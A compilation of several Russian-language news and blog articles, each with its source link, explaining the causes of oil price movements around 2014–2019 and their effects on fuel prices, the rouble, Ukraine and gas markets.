Почему дорожает нефть: стоимость растёт, с чем это связано?

В ОПЕК говорят, что уничтожили излишки нефти в мире, и теперь можно повышать цены

В мире высокими темпами растут цены на нефть. Они почти ежедневно ставят рекорды – начиная с 2014 года, когда цены резко обвалились вниз. 

На этот раз нефть марки Brent добралась до отметки 75 долларов за баррель. В последний раз такое было в октябре 2014 года. 

  • Динамика цен уже вызвала открытое недовольство в США и, надо думать, Белый дом начнет свою контригру. 
  • С другой стороны, нефтедоллары потекли в российский бюджет (который был сверстан исходя из средней цены на нефть в 40 долларов), компенсируя влияние санкций и увеличивая ресурс для геополитического противостояния с Западом и активной внешней политики.
  • В чем причина роста цен и долго ли продлится эта тенденция, разбиралась «Страна». 

Как дорожала нефть

Рекордсменом по росту стоимости является нефть марки Brent. Вот его динамика за год:

Но и другие сорта подросли в цене. Российская нефть Urals торгуется сейчас за рекордные в последние годы 70 долларов за баррель. Подбирается к этой отметке и американская WTI Crude, которой остались десятые доли процента. 

Динамика роста цены на нефть Urals за последние 12 месяцев.

Для такого обвала, который начался в 2014 году, эти показатели достаточно серьезны. В нижней точке этого обвала – 2016 год: нефть Brent стоила меньше 35 долларов за баррель. При «довоенной» цене в 101 доллар в 2013 году. 

Похожая динамика и у других нефтяных марок. Рост цен начал почти непрерывно восстанавливаться летом 2017 года. И с небольшими перебоями весной вошел в период рекордных показателей. 

Почему растут цены на нефть

«Нефть растет на геополитических рисках», – кратко подводит итоги новой нефтяной лихорадки на биржах агентство Bloomberg. 

Среди других причин издание называет сокращение запасов этого сырья в США. 

Нынешний рост вызван напряженностью на Ближнем Востоке. «Конфликт между Саудовской Аравией и поддерживаемыми Ираном хуситами в Йемене усугубился, вызывая озабоченность по поводу сбоев поставок энергоресурсов», – пишет агентство. 

  1. Более глобальным фактором роста цен нефти Bloomberg считает политику ОПЕК – организации стран-экспортеров этого сырья, которая начала постепенный откат цен к докризисному уровню. 
  2. «ОПЕК и ее союзники пришли к выводу, что они почти уничтожили глобальный избыток нефти», – пишет издание, намекая, что цены растут благодаря политике постепенного сокращения добычи, которое практикуют крупнейшие экспортеры, включая недавно присоединившийся Иран.
  3. В связи с этим Bloomberg ожидает ответного хода от американских производителей сланцев, которые становятся прибыльными при высоких ценах на нефть.

Кстати, по одной из версий, обвал цен на нефть в 2014-2016 годах был связан именно с тем, что страны ОПЕК хотели уничтожить сланцевую промышленность США, опустив цены ниже границы их рентабельности. Впрочем, по другой версии, это был «заговор против России», чтобы наказать ее за аннексию Крыма. 

Реакция США и России

Днем ранее Bloomberg писал, что Трамп проигрывает ближневосточным монархиям борьбу на рынке нефти. Такой вывод аналитики сделали из твита американского президента и ситуации на рынке нефти.

«Похоже, что ОПЕК опять этим занялась. С рекордным количеством нефти повсюду, включая забитые до отказа суда в море, цены на нефть являются искусственно очень завышенными! Это плохо и это недопустимо!» – написал он.

Отметим, что после этого гневного твита, который был опубликован 20 апреля, цены поднялись еще на доллар-два. А в Саудовской Аравии заявили в ответ, что «цену на нефть определяет рынок». 

В России говорят, что стоимость сырья может уже в апреле подняться до 80 долларов. Об этом заявил министр энергетики Андрей Новак. Он дал понять, что Москва активно участвует в политике ОПЕК по сокращению запасов нефти (хотя и не входит в эту организацию, которая позиционирует себя «другом Америки», как недавно выразился генсек ОПЕК). 

«Рынок видит успехи наших усилий по сокращению объемов запасов и реагирует позитивным образом», – сказал Новак.

В Bloomberg тоже предполагают, что рост цен продолжится, но будет не скачкообразным, а постепенным. Этот прогноз разделяют и в МВФ – там считают, что рост будет продолжаться и в 2019 году. 

Как рост нефтяных цен отразится на Украине

Пока нефть дорожает уже несколько месяцев подряд, в Украине с марта падают цены на бензин и дизтопливо. Если зимой цены на А-95 поднялись до 32-33 гривень, то сейчас они колеблются в пределах 27-29. 

Цены на бензин падают прямо сейчас. Данные vseazs.com

  • Аналитики связывают это с укреплением гривни.
  • Кроме того, зимой, когда доллар рос, крупные сети повышали цены опережающими темпами, пытаясь создать «запас прочности».
  • Сейчас, когда доллар слегка упал, они могут немного отыграть назад, пытаясь удержать клиентов, которые не одобрили зимнего роста цен и начали переходить на более бюджетные заправки. 

Однако если тенденция подорожания нефти продолжится, то цена на бензин «подтянется» за ней практически неизбежно. Тем более, что в мае возобновятся активные закупки топлива на полевые работы, которые потянут цены вверх.

Рост цен на нефть, который идет опережающими темпами в сравнении с другими сырьевыми товарами, также негативно влияет на внешнеторговый баланс страны, увеличивая его дефицит.

Ведь нефть и, связанный с ней по ценовой динамике, газ являются основными статьями импорта.

Кроме того, газ в последнее время Украина закупает в Европе по краткосрочным контрактам, которые чутко реагируют на любые колебания рынка.

Все это создает дополнительное давление на курс гривни к основным валютам, повышая шансы на ее девальвацию.

Источник: https://strana.ua/news/137594-tsena-nefti-24-04-2018-pochemu-dorozhaet-neft-i-chto-budet-dalshe.html

Нефть дорожает. Как это отразится на стоимости бензина

Американский институт нефти (API) заявил о снижении запасов чёрного золота в США. Это стало одной из причин, по которой цены на мировых рынках начали расти. Лайф разбирался, продолжит ли дорожать нефть и как это изменит цены на бензин.

Как следует из отчёта API, запасы нефти в США упали за прошедшую неделю на 7,2 миллиона баррелей. Кроме того, настораживающий долгосрочный прогноз дало американское Минэнерго.

По данным ведомства, добыча нефти в США в 2019 и 2020 годах снизится на 30 тысяч баррелей — до 12,24 и 13,23 миллиона баррелей в сутки соответственно.

США — один из крупнейших экспортёров нефти, поэтому эти новости спровоцировали ожидаемый рост цен.

Нефтяные цены поднялись до отметки начала 2019 года — осени 2018 года, — пояснил директор Академии управления финансами и инвестициями Арсений Дадашев. — Впрочем, на этом рост может остановиться.

Недавний всплеск цен был напрямую связан с падением стоимости доллара, который начался после слабого отчёта по промышленности и росту рабочих мест в США.

Сейчас американская валюта вновь укрепляется, а энтузиазм инвесторов, вызванный назначением принца Саудовской Аравии министром энергетики страны, постепенно угасает.

По мнению Арсения Дадашева, в какую бы сторону ни двинулись цены на нефть, стоимость бензина на заправках от этого сильно не изменится. Впрочем, это ещё не значит, что ценники останутся прежними.

В сентябре несколько крупных перерабатывающих заводов должны вновь закрыться на ремонт. Это значит, что в некоторых регионах стоимость горючего возрастёт за счёт увеличения затрат на транспортировку.

Ко всему этому уже в 2020 году правительство собирается ввести новые акцизы, которые окажут прямое влияние на стоимость бензина. Поэтому если цены на топливо и будут расти, то только по внутренним причинам, а не из-за скачка цен на нефть, считает Арсений Дадашев.

Цены на нефть могут продолжить расти, — объясняет эксперт Международного финансового центра Гайдар Гасанов. — Что касается цен на бензин в России, то, как мы заметили, при падении и росте мировых цен на нефть бензин в стране продолжает только расти.

В первую очередь это связано с экспортно-сырьевой моделью экономики нашей страны. Отечественные нефтяные компании добивались от правительства 100% компенсации издержек от заморозки цен на бензин, которую не получили.

При этом независимые АЗС, которые занимают существенную долю отечественного рынка автозаправок, несут огромные убытки, поскольку им приходится закупать топливо у посредников.

Поэтому цены на бензин в стране будут стремиться к среднеевропейским, считает Гайдар Гасанов. По его прогнозам, цена на бензин до конца года может вырасти на 5–6%. Уже осенью она может достигнуть 48,5 рубля за литр.

Нынешнее — вероятно, ещё и будущее — удорожание нефти увеличит прямые доходы от экспорта в «карманах» российских добывающих компаний, прибавятся и налоговые отчисления в бюджет, — отметил ведущий аналитик Forex Optimum Иван Капустянский. — При этом на заправочных ценниках это отразится мало. Эффект если и будет, то отложенный — и уже после января. Пока же цены останутся на уровне сегодняшних значений.

Источник: https://life.ru/1241702

Чем грозят России высокие цены на нефть?

Есть такие риски — нефть может подняться до 100 долларов за баррель. Такой прогноз в интервью Business FM дал министр энергетики Александр Новак. А в чем они заключаются?

Юрий Смитюк/ТАСС

Грядущие американские санкции против Ирана, от которых пока шарахаются и в Европе, и во многих азиатских странах, плюс падение добычи в Венесуэле и Ливии. Стоимость сырья на этом растет.

Но теперь высокие цены на нефть в России вызывают не только радость — хотя бы потому, что за взлетом может последовать сильное падение.

Вот и министр энергетики Александр Новак в интервью Business FM назвал 100 долларов за нефть рисками:

Риски того, что нефть может уйти к 100 долларам, а потом скатиться вниз, это еще полбеды. Новая реальность сейчас не только внешняя, но и внутренняя. Нефть, как никогда прежде, стоит дорого в рублях — уже близко к 6000 за баррель.

Сырье на внешнем рынке дорогое, а рубль слабый. Раньше такого не бывало — нефть в рублях стоила всегда примерно 3600. Это значит, что при сегодняшних нефтяных ценах за доллар давали бы 41 рубль.

А сейчас за доллар дают в полтора раза больше.

И получается такая цепочка. В России повышают налог на добычу нефти, сама нефть дорогая, рубль слабый. Продавать топливо внутри страны становится все более невыгодно. В итоге — дорогой бензин. Ну и рост инфляции, констатирует гендиректор инвестиционного партнерства «Ван Дер Блэк» Станислав Машагин:

Станислав Машагин генеральный директор инвестиционного партнерства «Ван Дер Блэк»

Эксперт неслучайно упоминает бюджетное правило. Сейчас все доходы от нефти выше 40 долларов за баррель уходят в кубышку, на случай плохих времен.

Благодаря высоким ценам в этом году страна может дополнительно получить 5 трлн рублей. Огромные деньги — больше половины того, что требуется на «майский» указ.

Но власти не будут их тратить, все пойдет в резервы — если точнее, в покупку иностранной валюты.

Вот почему вкупе с угрозой новых санкций рубль не укрепляется на сверхвысоких ценах на нефть. А это, соответственно, может привести к еще большему подорожанию бензина. Правда, правительство пообещало не допустить роста цен на топливо. Делается это в ручном режиме, методом кнута и пряника.

Нефтяникам, с одной стороны, обещают компенсации за то, что они не повышают цены, а с другой — грозят наказанием. Но делать это становится все труднее, потому что проклятая нефть на мировом рынке все дорожает и скоро может дойти до 100 долларов. Раньше мы этому радовались. Пришло время грустить.

Добавить BFM.ru в ваши источники новостей?

Источник: https://www.bfm.ru/news/396278

Нефть с Нового года подорожала на 11%. Что будет с рублем?

Правообладатель иллюстрации Egor Aleev/TASS

Цены на нефть с начала года выросли более чем на 11%. По данным биржи ICE, в среду днем стоимость мартовских фьючеров на Brent поднималась выше 60 долларов за баррель. Для сравнения, в последний день 2018 года нефть марки Brent стоила всего 53,8 доллара за баррель.

Нефть начала дорожать 28 декабря и с тех пор растет.

До этого нефть падала в течение нескольких месяцев из-за опасений инвесторов, что спрос на нефть будет низким на фоне замедления мировой экономики и торговых войн между США и Китаем.

Несмотря на рост последних дней, цены на нефть пока не отыграли прошлогоднего падения.

Почему нефть опять начала дорожать?

Основной причиной такого значительно роста стали ожидания участников рынка, что спрос и предложение на нефтяном рынке стабилизуются в результате сделки ОПЕК+, пишут аналитики банка Nordea. ОПЕК и страны, не входящие в картель, договорились о сокращении добычи нефти в начале декабря.

Соглашение ОПЕК+ вступает в силу в этом году.

Кроме того, инвесторов обнадежила Саудовская Аравия. Страна ищет возможность повысить стоимость нефти Brent до 80 долларов за баррель через сокращение объема экспорта нефти до 7,1 млн баррелей в сутки, сообщила газета The Wall Street Journal со ссылкой на представителей ОПЕК. Для сравнения — в декабре экспорт составлял 7,3 млн баррелей в сутки.

Еще одна причина роста цен на нефть — это переговоры между лидерами США и Китая по поводу торгового спора.

Аналитики Nordea предполагают, что на фоне этих переговоров восстанавливается спрос на рисковые активы, в том числе и на нефть.

Кроме того, цены на нефть может поддержать традиционный высокий спрос на энергоресурсы в зимний период, пишут экономисты Nordea. Однако в банке полагают, что цены на нефть вряд ли укрепятся выше 60-62 долларов за баррель в ближайшее время.

Похоже, что рынок нефти будет в 2019 году сбалансированным, говорится в докладе Morgan Stanley. Однако цены вряд ли будут выше 65 долларов за баррель на фоне сокращения доли ОПЕК и падения импорта со стороны Китая, прогнозируют в банке. Ранее в банке прогнозировали, что цены на нефть могут к концу года вырасти до 75 долларов за баррель.

В Росбанке полагают, что до этого нефть была «перепроданной», то есть недооцененной, поэтому и цены начали восстанавливаться.

Что будет с рублем?

Рубль при этом в среду дешевеет к доллару и евро. Курс доллара к 14:32 мск вырос на 19 копеек, американская валюта стоит дороже 67 рублей. Курс евро поднялся на 20 копеек до 76,75 рубля.

До этого рубль укреплялся в течение трех торговых дней. В начале этого года он показал лучшие результаты среди валют развивающихся стран после южноафриканского ранда, говорится в докладе Росбанка.

В Сбербанке КИБ полагают, что рубль в ближайшее время может еще укрепиться на 2-3% на фоне оптимизма, связанного с переговорами между США и Китаем. В отчете также говорится, что российские экспортеры, которые скупали валюту в конце того года, перестали это делать и могут в ближайшее время ее продавать. Что так же приведет к укреплению рубля.

В Nordea ожидают, что доллар в ближайшие дни будет стоить 66,5-67,5 рубля.

Однако все аналитики оговариваются, что многое будет зависеть от санкционного режима. 18 января минфин США может снять санкции с активов Олега Дерипаски, в том числе «Русала».

Источник: https://www.bbc.com/russian/news-46811177

Газ дешевеет, потому что нефть дорожает: началась новая эпоха

Во втором квартале биржевые цены на природный газ окончательно оторвались от цен на нефть. В то время как нефтяные котировки находятся в среднем на комфортном уровне в 65 долларов за баррель, в Европе стоимость газа на бирже — на десятилетних (!) минимумах: 110 долларов за тысячу кубометров, цена СПГ в Азии — 170 долларов за тысячу кубов.

Напомним, около двух третей поставок «Газпром» продает по долгосрочным контрактам с нефтяной привязкой, преобладает нефтяная индексация и в контрактах на поставки СПГ с «Ямал СПГ» компании «Новатэк».

Поэтому снижение цен на газ для российских производителей имеет умеренное значение, пока здесь важнее следить за нефтяными котировками.

В то же время необходимо помнить, что новые контракты этих компаний все в большей степени будут привязаны к «оторвавшимся» от нефти ценам на газ.

Для сравнения — цены на газ по договорам с нефтяной ценовой привязкой при текущих котировках нефти почти в два раза выше биржевых цен на газ в Европе и Азии.

Почему возникла такая ситуация? Причин как минимум две. Во-первых, биржевые цены отражают лишь часть (как представляется — заметно меньше половины) международной торговли газом и СПГ. И тот же катарский, австралийский СПГ поставляется на азиатские рынки преимущественно с нефтяной ценовой привязкой.

Соответственно, спрос на биржевой газ не так велик относительно всей мировой торговли, поэтому даже небольшой избыток предложения приводит к падению цен. А предложение это выросло в результате ожидавшегося избытка на рынке сжиженного газа: запускаются новые заводы по сжижению.

Тем не менее главный вопрос — что дальше? Предсказывать тут достаточно сложно. С одной стороны, спрос на газ продолжит расти, причем гораздо быстрее, чем на нефть. Но будет расти и предложение.

В результате парадоксальным образом цены на нефть («уходящий» энергоноситель) оказываются намного более прогнозируемыми в средней и долгосрочной перспективе, в отличие от цен на «перспективный» газ.

Прогноз ежегодного роста спроса на нефть сохраняется, до «пика нефти» мы еще не дошли и, вероятно, дойдем не ранее чем через десять лет. Во многом это связано с умеренными успехами в снижении цен аккумуляторов и ограниченным увеличением спроса на автомобили.

На таком фоне со стороны предложения уже действуют определенные ограничения.

Во-первых, дешевой в добыче нефти объективно все меньше.

Во-вторых, да, сланцевая добыча может обеспечивать весь прирост спроса, но при высоких ценах на нефть. Уже при ценах Brent в 60 долларов за баррель и ниже прирост сланцевой добычи минимален или вообще прекратится, особенно если сланцевые компании перестанут работать в ноль, а захотят получать прибыль.

В-третьих, на нефтяном рынке есть соглашения ОПЕК+, которые поддерживают цену.

Все эти факторы, конечно, все равно ничего не гарантируют, но делают вполне вероятным удержание цен на нефть в указанном диапазоне.

С газом неопределенностей больше: при однозначном и быстром росте спроса мы видим и рост предложения. А при долгосрочных ценах на СПГ в Азии в 270 долларов за тысячу кубометров, необходимых большинству производителей для стабильного заработка, в генерации уже конкурентоспособны те же ветряки. При этом газовой ОПЕК пока нет.

Еще одна особенность производства СПГ — это работа в условиях, когда цены значительно меньше полной себестоимости добычи. Такая ситуация в случае сланцевой нефти приводит к тому, что за несколько месяцев объем добычи снижается и рынок вновь становится сбалансированным.

С СПГ ситуация другая: заводы будут работать только по принципу получения операционной прибыли (то есть без учета капитальных затрат, ведь заводы уже построены), даже если цена продаваемого сжиженного газа ниже полной себестоимости (а разница цен между полной себестоимостью и работой в режиме компенсации текущих затрат — примерно два раза).

Именно поэтому американцы уже давно производят СПГ по ценам, которые не окупают его полную себестоимость. Более того, только очень низкие цены на газ в США в настоящее время (80 долларов за тысячу кубометров) позволяют получать операционную прибыль при экспорте.

К примеру, еще три месяца назад сетевой газ в Штатах стоил те же 105-110 долларов — ровно столько, сколько сейчас в Европе. Ясно, что при нулевой разнице цен экспортировать СПГ в Европу не было бы никакого смысла.

Ведь даже при списанных капитальных затратах остаются операционные расходы на сжижение и транспортировку. Но и при ценах в Соединенных Штатах в 80 долларов производство СПГ уже находится на гране операционной рентабельности.

Если мировые цены еще чуть-чуть упадут или внутренние цены повысятся, производство начнет останавливаться.

Наконец, еще один парадокс — дорогая нефть оказывает давление и на цены на газ. Очень низкие цены в США во многом обусловлены производством попутного газа при растущей добыче нефти.

Кроме того, часто добывается газ с большим содержанием конденсата (конденсат, грубо говоря, — это сверхлегкие фракции нефти), что делает себестоимость самого газа низкой. Американские компании, добывающие так называемый сухой газ (метан без конденсата), чувствуют при нынешних ценах себя очень неважно.

Акции пионера сланцевой добычи в Соединенных Штатах, компании Chesapeake (добывает преимущественно сухой газ), упали до двух долларов по сравнению с 3,5 доллара тремя месяцами ранее.

А катарский СПГ очень дешев (по себестоимости), так как у газа для сжижения в этих проектах «отрицательная себестоимость» — в том числе за счет того, что добыча полностью окупается экспортом сопутствующего конденсата. Российский «Новатэк» также отмечал, что все операционные затраты на «Ямал СПГ» компенсируются продажами попутно добываемого конденсата. Есть и другие примеры.

И наоборот, если представить, что цены на нефть рухнут (например, в результате внезапного технологического прорыва и падения себестоимости аккумуляторов), ситуация станет обратной.

Мало того, что подешевевшая нефть не будет поддерживать низкую себестоимость газа, так вырастет еще и спрос на электроэнергию, и таким образом и спрос на газ для выработки этих дополнительных объемов электричества.

Все вышесказанное не означает, что газ будет дешев. Вполне возможно, в среднесрочной перспективе цены выйдут на уровень 250-270 долларов за тысячу кубометров (и будут там удерживаться), что позволит зарабатывать большинству производителей.

Но неопределенности тем не менее сохраняются: со стороны спроса это и экологическая политика Китая, и конкуренция с ВИЭ. При этом механизмов ценовой поддержки, аналогичных рынку нефти, здесь пока нет.

А со стороны предложения на рынок СПГ активно выходят все новые компании, рвутся в бой все новые проекты.

Источник: https://ria.ru/20190704/1556152605.html

Нефть дешевеет, а в России топливо дорожает. Почему? — DRIVE2

Сподвигли на этот пост жаркие споры о причинах дорожания бензина при падении мировых цен на нефть.Теперь будем разбираться в причинах. Итак, почему дорожает бензин в России?1. Потому, что падает курс рубля и цена на нефть.

Взгляните на еще один график — это курс доллара США. Не правда ли, кривая напоминает график стоимости топлива? Все просто.

Представьте, что вы продаете некий товар как за границу (получая доход в долларах), так и на домашнем рынке за рубли. Рубль упал, и вам становится выгоднее продавать за доллары, а не за рубли.

Естественно, вы начинаете продавать больше товара за границу и меньше — внутри страны, потому что вы коммерческая организация, и вы себе не враг.

А теперь представьте, что мировые цены на ваш товар к тому же снижаются. Сейчас так происходит у нефтяников. У топ-менеджеров — обязательства перед сотрудниками, инвестиционные планы, а главное — давление собственников, которые не хотят терять деньги.

Поэтому нефтяники продают свой товар за границу, создавая внутри российского рынка дефицит как сырой нефти, так и бензина. А когда какой-то товар в дефиците, он дорожает.»Очень большая часть нефти отправляется на экспорт. На внешний рынок выгоднее экспортировать, поэтому внутренний рынок испытвает дефицит. Это, конечно, влияет и на цены».

Игорь Буцаев, начальник техническо-экономических исследований компании «Гипровостокнефть».

2. Потому, что государство заинтересовано в высокой выручке нефтяных компаний.Тройку лидеров нефтяного рынка России составляют «Роснефть», «Лукойл» и «Газпром нефть». Первая и третья компании по большей части принадлежат государству. «Лукойл» — частная компания, но при этом является крупным налогоплательщиком.

Налоговые поступления от нефтяников — это примерно половина (!) российского бюджета. Экономика страны напрямую зависит от цен на нефть и от благосостояния добывающих и экспортирующих нефть корпораций.

Если эти корпорации обеднеют, то не на что станет строить стадионы для Чемпионата мира по футболу, развивать Крым и платить пенсии бабушкам.

3. Потому, что государство повышает налог на добычу полезных ископаемых (НДПИ) и понижает экспортные пошлины.Это называется «налоговый маневр». Стремясь сохранить налоговые поступления от нефтяников в госбюджет, государство повысило НДПИ, но взамен снизило экспортные пошлины. Что создало дополнительный повод для нефтяников продавать свой товар за границу. В результате — смотри пункт первый.

4. Потому, что государство повышает акциз на бензин.Изначально было понятно, что даже без снижения курса рубля и падения цен на нефть «налоговый маневр» удорожает бензин на внутреннем рынке.

Поэтому акциз на готовый бензин планировали снижать. Но потом выяснилось, что у страны нет средств на ремонт дорог, поэтому топливный акциз с 2015 года увеличат на 1 рубль.

Это даст дополнительно 60 млрд на починку трасс, в основном в российской глубинке.

Напомним, что параллельно с этими акцизами автомобилисты продолжают платить транспортный налог, который непонятно по какой причине по-прежнему исчисляется из мощности двигателя. Кстати, когда собирались поднимать акциз, транспортный налог хотели отменять, но про это сейчас никто в Госдуме не вспоминает. А что делать, если стране нужны деньги на дороги?

«У нас цена на топливо растет, потому что акцизы и все косвенные налоги увеличиваются. До 10% к новому году снова будет увеличение законодательное по акцизам. Поэтому до 10% прогнозируют и рост цен на бензин». Игорь Буцаев, начальник техническо-экономических исследований компании «Гипровостокнефть»

Что в итоге?Итак, повышение топлива складывается из шести основных слагаемых:-падение мировых цен на нефть,-снижение курса рубля,-повышение налога на добычу полезных ископаемых и снижение экспортной пошлины на нефть,-повышение акцизов на бензин,-коммерческая ориентированность нефтяных компаний,-сильная зависимость госбюджета от налоговых поступлений.

Можно считать это большой неудачей, но сейчас в пользу повышения цен на бензин играет слишком много факторов.

Теперь — к опыту Соединенных Штатов. Почему же там бензин дешевеет, пока у нас он дорожает?1. Потому, что существует реальная конкуренция между американскими нефтяными компаниями, а у экономики США есть другие доходы, кроме нефти.

Все крупнейшие американские компании — ExxonMobil, ConocoPhillips, Chevron и Valero — это частные, а не государственные. Кроме того, американская экономика сильно диверсифицирована — намного лучше, чем в России, развит и промышленный, и сельскохозяйственный сектор, а также сектор услуг.

«Диаметральная разница между Россией и США существует, потому что конкуренции в России нет — она сведена к минимуму. Решение только одно — стимулировать конкуренцию. А возможно ли это — это тема для огромного доклада. А в США цены снижаются, потому что у них есть конкуренция, все просто.» Сергей Ветчинин, PR-советник Ассоциации независимых нефтеперерабатывающих организаций.

2. Потому, что США регулирует цены на внутреннем рынке нерыночными методами.

Собственно говоря, этим занимается и Россия, как и вообще любое другое государство, — в чистом виде капиталистических стран со свободным рыночным регулированием не существует. Американскому правительству выгодны низкие цены на топливо.

Чем ниже цены на бензин, тем дешевле логистика. А значит, дешевле товары и выше спрос на них. Сами рядовые американцы, сэкономив на топливе, радостно понесут свои деньги в торговые сети. Также не стоит списывать со счетов и геополитику: понижение цен на нефть позволяет ослаблять стратегических противников. Например Россию.

«Я думаю, что регулирование цен в Соединенных Штатах поставлено намного серьезнее, чем в России. Вот эти сказки про всемогущие рыночные механизмы они остаются все-таки сказками там, где люди по-настоящему занимаются экономикой.

В части электричества я хорошо знаю, что, несмотря на колебания в 15 раз первичных энергоносителей, на нефть, например, 20 лет они держали цены на электричество стабильно с точностью до 15%. Представить себе, что это делается с помощью рыночных механизмов абсолютно невозможно, исключено».

Иван Грачев, председатель комитета по энергетике Госдумы РФ.

Что в итоге?Повышение цен на топливо в России совершенно не удивляет тех, кто знаком с экономическим устройством страны. Федеральная антимонопольная служба может бесконечно заводить дела против нефтяных корпораций, но цены все равно будут расти, потому как экспорт нефти — это залог существования России как государства.

Источник: www.kolesa.ru

Источник: https://www.drive2.ru/b/2830707/

Почему нефть дорожает, и какие факторы влияют на ее ценообразование?

Ни у кого не вызывает сегодня вопросов утверждение о том, что экономический сектор Российской Федерации находится в прямой зависимости от котировок нефти на глобальном сырьевом рынке.

В качестве главных источников доходной части госбюджета выступают поступления валюты от продажи на рынке углеводородов.

Вопросы, связанные с ценами на нефть, интересуют наших соотечественников не меньше, чем правительство, ведь удешевление сырья на экономику страны влияет даже в большей степени, нежели все западные санкции, вместе взятые.

Редакция информационного портала «Пронедра» решила детально изучить ситуацию с тем, чтобы выяснить, какие именно факторы воздействуют на ценообразование «черного золота», почему стоимость нефти падает или растет, и, наконец, что ожидает котировки в обозримой перспективе?

Почему цены на нефть резко рухнули, а потом снова начали повышаться?

Независимые эксперты по-разному объясняют значительные колебания котировок нефти на рынке.

Специалисты ссылаются при этом преимущественно на кризис в глобальном экономическом секторе: он отличается системным характером, а также тем, что повлек за собой весьма заметное сокращение общей потребности в углеводородных энергетических носителях.

Однако, давайте откровенно: даже рядовые обыватели осознают, что аргументы подобного рода выглядят весьма и весьма туманно и совсем неубедительно. Автотранспортные средства по дорогам как курсировали, так и курсируют, трассы по-прежнему продолжают асфальтировать, тепло в наши дома все поступает.

Что это означает? Бензин, дизельное топливо, асфальт и мазут, возможно, и стали менее востребованными, но не до такой степени, чтобы они оказались в состоянии в разы обрушить цены. Мы слышим зачастую и следующий аргумент: предложение, мол, существенно превышает сегодня спрос.

Казалось бы, логика очевидна, однако, почему же нефть снова дорожает  после стремительного падения? Аналитики единогласно указывают здесь на сокращение объемов добычи сырья. Тоже вроде бы вполне логично, но почему так ощутимо? Котировки нефти упали на несколько процентов, однако, едва ли это могло оказать такое влияние на цены.

Больше того, Иран в разы увеличил объемы своего предложения после снятия с него санкций, а страны ОПЕК, обещавшие урезать добычу, на практике сделали это через одну.

Выходит, никому не дано понять закономерности, которым подчиняются сегодня нефтяные котировки? За кулисами остается, конечно, многое, но вот с кое-чем разобраться все же реально.

Фактор №1: «Печатный станок»

Важно понимать, что нефть, как и американская валюта, представляет собой прежде всего товар. Известные миру экономисты Смит и Рикардо еще задолго до нефтяного кризиса четко сформулировали следующий тезис: чем больше товара на рынке, тем меньше денег за него в итоге дадут.

Эта нехитрая истина отлично знакома, впрочем, любому продавцу, даже самому мелкому предпринимателю. Эмиссия доллара сегодня ограничена, и если в Федрезерве США решат запустить печатный станок, что вполне возможно при текущем состоянии внешней задолженности государства, то «американец» начнет лишаться постепенно покупательной способности.

Причем, что характерно, по отношению не только к «черному золоту», но и к ряду остальных товаров. Идем дальше.

Национальные финансовые регуляторы ряда европейских стран предпочитают придерживаться на данный момент политики понижения ставок.

За этим автоматически последует появление на глобальном рынке так называемых «дешевых финансовых средств», главная задача которых заключается в оживлении экономики ЕС, отличающейся сегодня некоторым застоем.

Балансу спроса и предложения практически неизбежно предстоит в этой связи сместиться в противоположную сторону от его нынешнего положения. За сложившейся ситуацией ожидаемо последовало повышение стоимости золота. Скупкой желтого драгметалла активно занимаются сегодня Россия, КНР и Германия.

Они заметно повышают, таким образом, собственные резервы, не подверженные девальвации. Может возникнуть вполне резонный вопрос: при чем же тут нефть? Но ведь не просто так ее называют «черным золотом». И пока стоит она дешево – запасы делаются впрок, а котировки тем самым плавно повышаются.

Ключевой момент здесь вот в чем: степень доверия к «бумажной валюте» снижается, тогда как золото – черное оно или обычное – продолжит оставаться в цене всегда.

Фактор №2: сланцевое производство в США

Активное развитие производства сланцевого сырья на территории Соединенных Штатов практически вывело их на позицию мирового лидера по экспорту.

Между тем, высокая себестоимость сланцевой добычи при настолько низких расценках автоматически сделали данный сектор совершенно нерентабельным, и в течение минувшего года остановили свою деятельность многие из буровых вышек.

Общий объем добычи сланцевой нефти сократился, между тем, несущественно, и ощутимое повышение котировок за этим последовать не могло.

Более того, американские нефтяники успешно нашли способы снижения себестоимости добычи сланцевого сырья, и привело это к обратному увеличению численности активных буровых установок в стране. Себестоимость, однако, как и ранее, высокая, а рост цен на нефть несет выгоду и сланцевикам из США.

Фактор №3: ошибки мировой статистики

Далее – о некоторых весьма любопытных нюансах.

Редакция авторитетного зарубежного издания Wall Street Journal отметила не так давно, что участники глобального рынка нефти в течение довольно продолжительного периода времени заблуждались относительно истинных объемов предлагаемой им сырой нефти, и за этим была, надо сказать, достаточно резкая реакция. Оказалось, что миллионы баррелей углеводородов существовали лишь виртуально, то есть в электронном и бумажном вариантах, на самом же деле по факту они элементарно отсутствовали. В качестве объяснения столь грустного факта была названа, что интересно, ошибка статистики. Предумышленная или случайная то была такая «небрежность» – мы, вероятнее всего, не выясним, однако, искусственно сформированный дисбаланс спроса и предложения всем известно к чему в результате привел.

Виновные тем временем отсутствуют. Серьезный ущерб, между тем, понесли в данном случае все без исключения «игроки» мирового нефтерынка, включая и американских, вложивших в свое время поистине огромные финансы в разработки сланцевых месторождений.

Сегодня, когда так называемое «виртуальное» сырье покинуло глобальный рынок, котировки нефти снова устремились в сторону повышения. Аналитики напоминают о том, что нефть представляет собой ресурс невозобновляемый. Не секрет, что мировой экономический сектор нуждается в огромном количестве энергетических ресурсов, и главные из них сегодня – углеводороды.

Залежи углеводородного сырья формировались на планете на протяжении миллионов лет, а расходуют их в настоящее время в более стремительном темпе.

Разведанные и сравнительно доступные месторождения сейчас заметно истощаются, и отдельные государства мира, не располагающие иными источниками доходов в бюджеты, помимо нефтяных, уже в обозримом будущем серьезно рискуют потерять «львиную» долю своих финансовых средств.

Современные технологии добычи нефти при этом только усложняются, а, следовательно, и растут в цене. Уверенно стартуют на данный момент разработки шельфа в Арктике, растет количество плавучих буровых платформ, осуществляющих добычу нефти с большой глубины мирового океана.

С острой проблемой дефицита углеводородов наша цивилизация столкнется неизбежно, а в связи с тем, что стоимость их за последние несколько лет заметно упала, инвестирование в нефтедобычу продемонстрировало сокращение.

За всем этим последовало сворачивание целого ряда довольно важных проектов, ориентированных на разведку новых месторождений, а функционирующие едва ли обладают способностью на протяжении продолжительного периода времени в полном объеме удовлетворять повышающийся спрос.

«Существенное наращивание объемов добычи нефти моментально – невозможно, так что мы ожидаем сейчас очередного повышения котировок. Цены на нефть в обозримой перспективе однозначно будут расти», — констатировали аналитики компании «Финам».

Что препятствует повышению нефтяных котировок сейчас?

Глобальный экономический кризис представляет собой суровую действительность современного человечества. Для роста цен на «черное золото» требуется высокий спрос, однако, уровень его сейчас, к сожалению, только снижается.

